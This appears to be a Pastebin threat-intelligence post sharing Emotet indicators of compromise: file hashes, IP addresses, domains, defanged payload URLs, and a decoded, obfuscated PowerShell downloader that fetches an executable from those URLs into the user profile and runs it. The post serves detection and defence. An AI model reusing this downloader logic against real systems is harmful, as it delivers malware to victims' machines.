Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- MD5:
- 26991e003c7df1b7ed815750866abd09
- 5530dd44a68abf23a1a96a698b6a6265
- b0f5b83ed27dde1c0f30cd1701173608
- e2c83ddac7314b94a5bffbbef718c2e2
- 9af6552d4936870dc260b76a26d3ac34
- IPs:
- 104.31.70.84
- 166.62.10.28
- 185.104.45.162
- 65.182.101.179
- 92.53.96.232
- Domains:
- foodwaydelivery.com
- invisio-new.redstone.studio
- royalbluebustour.com
- sm-n.ru
- stoeltje.com
- URLs:
- hxxp://foodwaydelivery.com/all-backup/wp-admin/oa5hfhw/
- hxxp://royalbluebustour.com/wp-admin/oqjbod/
- hxxp://sm-n.ru/wp-includes/eTCOWfxoe/
- hxxp://invisio-new.redstone.studio/wp-content/ybeq/
- hxxp://stoeltje.com/AdventuresInBabysitting/l8rn/
- Decoded Base64 Powershell:
- $Qgxbzbieqrrx='Irxpoxjkowz';
- $Wpxifjsilvrqc = '890';
- $Ckgyxfynsnxv='Gqnmyuddta';
- $Waazouqp=$env:userprofile+'\'+$Wpxifjsilvrqc+'.exe';
- $Kfsacchqb='Tznquykrsj';
- $Glmodecoxsyda=.('new-'+'o'+'bjec'+'t') NET.weBCLIENt;
- $Fmctosxtdci='hxxp://foodwaydelivery.com/all-backup/wp-admin/oa5hfhw/
- hxxp://royalbluebustour.com/wp-admin/oqjbod/
- hxxp://sm-n.ru/wp-includes/eTCOWfxoe/
- hxxp://invisio-new.redstone.studio/wp-content/ybeq/
- hxxp://stoeltje.com/AdventuresInBabysitting/l8rn/'."sp`lit"('
- ');
- $Xjnyaozr='Svsvskuoxj';
- foreach($Muyiwcipde in $Fmctosxtdci){try{$Glmodecoxsyda."dO`WnlO`ADfILE"($Muyiwcipde, $Waazouqp);
- $Umkdifiju='Curpdgbcpf';
- If ((.('G'+'et'+'-Item') $Waazouqp)."LENG`Th" -ge 26372) {[Diagnostics.Process]::"S`TART"($Waazouqp);
- $Xzgzwelndtoa='Guiwqwjqbavrh';
- break;
- $Lymgsfiyj='Kyybdppkvig'}}catch{}}$Kihyfefwogru='Vqxvzjzllrzx'
Add Comment
Please, Sign In to add comment